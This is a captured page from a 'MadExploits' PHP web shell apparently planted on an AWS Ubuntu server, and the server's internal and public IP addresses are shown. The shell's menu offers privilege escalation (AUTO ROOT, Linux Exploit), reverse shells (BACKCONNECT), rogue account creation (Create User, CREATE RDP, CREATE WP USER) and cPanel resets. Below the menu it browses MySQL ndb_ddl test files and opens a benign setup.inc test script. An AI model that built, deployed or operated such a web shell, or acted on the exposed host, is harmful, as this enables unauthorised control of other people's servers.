Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.149.8
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
ndb_ddl /
[ HOME SHELL ]
Name
Size
Permission
Action
alter_rename.inc
4.59
KB
-rw-r--r--
alter_rename_copying.result
414
B
-rw-r--r--
alter_rename_copying.test
277
B
-rw-r--r--
alter_rename_inplace_force.res...
188
B
-rw-r--r--
alter_rename_inplace_force.tes...
698
B
-rw-r--r--
alter_rename_inplace_implicit....
192
B
-rw-r--r--
alter_rename_inplace_implicit....
567
B
-rw-r--r--
alter_rename_simple.result
302
B
-rw-r--r--
alter_rename_simple.test
301
B
-rw-r--r--
cleanup.inc
219
B
-rw-r--r--
list_objects.inc
1.61
KB
-rw-r--r--
my.cnf
554
B
-rw-r--r--
rename_single.result
331
B
-rw-r--r--
rename_single.test
456
B
-rw-r--r--
setup.inc
2.88
KB
-rw-r--r--
verify_mysql_dd.inc
850
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup.inc
--source include/have_ndb.inc # Test requires several mysqld(s) started which is not # suported with embedded, skip this test --source include/not_embedded.inc # No need to include the setup commands in .result file --disable_query_log # Create one connection to each mysqld let $i = $NUM_MYSQLDS; while($i) { let $_port= \$MYSQLD_PORT_$i; if (!$_port) { die Not all $MYSQLD_PORT_* env. variables are configured; } --connect(mysqld$i,127.0.0.1,root,,test,$_port) dec $i; } # Create special ndb_ddl_test databases CREATE DATABASE ndb_ddl_test; CREATE DATABASE ndb_ddl_test2; # Always use the ndb_ddl_test database USE ndb_ddl_test; CREATE TABLE t1( a INT, b INT, PRIMARY KEY(a,b), KEY(b) ) ENGINE=ndb; INSERT INTO t1 VALUES (1,1), (2,2), (3,3), (4,4), (5,5); CREATE TABLE t2( a INT PRIMARY KEY, b VARCHAR(255), c DATETIME, KEY(b), KEY(b,c) ) ENGINE=ndb; INSERT INTO t2 VALUES (1,'1','2015-03-01 00:00:01'), (2,'1','2015-03-02 00:00:02'), (3,'1','2015-03-03 00:00:03'), (4,'1','2015-03-04 00:00:04'), (5,'1','2015-03-05 00:00:05'); CREATE TABLE t3( a INT PRIMARY KEY, b VARCHAR(255), c DATETIME, KEY(b), INDEX(a,b,c) ) ENGINE=ndb; INSERT INTO t3 VALUES (1,'1','2015-03-01 00:00:01'), (2,'1','2015-03-02 00:00:02'), (3,'1','2015-03-03 00:00:03'), (4,'1','2015-03-04 00:00:04'), (5,'1','2015-03-05 00:00:05'); CREATE TABLE t4 ( a INT UNSIGNED NOT NULL PRIMARY KEY, b INT UNSIGNED, c INT UNSIGNED, UNIQUE bc_unieuq_index(b,c), UNIQUE b_unique(c) ) ENGINE=ndb; INSERT INTO t4 VALUES (1,1,1), (2,2,2), (3,3,3), (4,4,4), (5,5,5); CREATE TABLE t5 ( a int NOT NULL, b int NOT NULL, c int NOT NULL, d int NOT NULL, e int, PRIMARY KEY (c, b, a, d), INDEX(d), INDEX(c) ) ENGINE=ndb; INSERT INTO t5 VALUES (1,1,1,1,1), (2,2,2,2,2), (3,3,3,3,3), (4,4,4,4,4), (5,5,5,5,5); CREATE TABLE t6 ( a varchar(37) ) ENGINE=ndb; INSERT INTO t6 VALUES ('value1'), ('value2'), ('value3'), ('value4'), ('value5'); # blob table CREATE TABLE t7 ( a INT NOT NULL PRIMARY KEY, b TEXT NOT NULL, c INT NOT NULL, d LONGBLOB, KEY index_c(c) ) engine=ndbcluster; INSERT INTO t7 VALUES (1,REPEAT('1b', 371),1,REPEAT('1d', 65531)), (2,REPEAT('2b', 372),2,REPEAT('2d', 65532)), (3,REPEAT('3b', 373),3,REPEAT('3d', 65533)), (4,REPEAT('4b', 374),4,REPEAT('4d', 65534)), (5,REPEAT('5b', 375),5,REPEAT('5d', 65535)); --enable_query_log # # List all objects for the created tables and store them # in temporary tables in the test database let $num_tables = `select count(*) from information_schema.tables where TABLE_SCHEMA = 'ndb_ddl_test'`; if (!$num_tables) { die Could not figure out number of tables in ndb_ddl_test database; } let $counter = 1; while ($counter <= $num_tables) { let $create_table_name = test.pre_t$counter; let $list_table_name = ndb_ddl_test.t$counter; --source list_objects.inc inc $counter; }
Close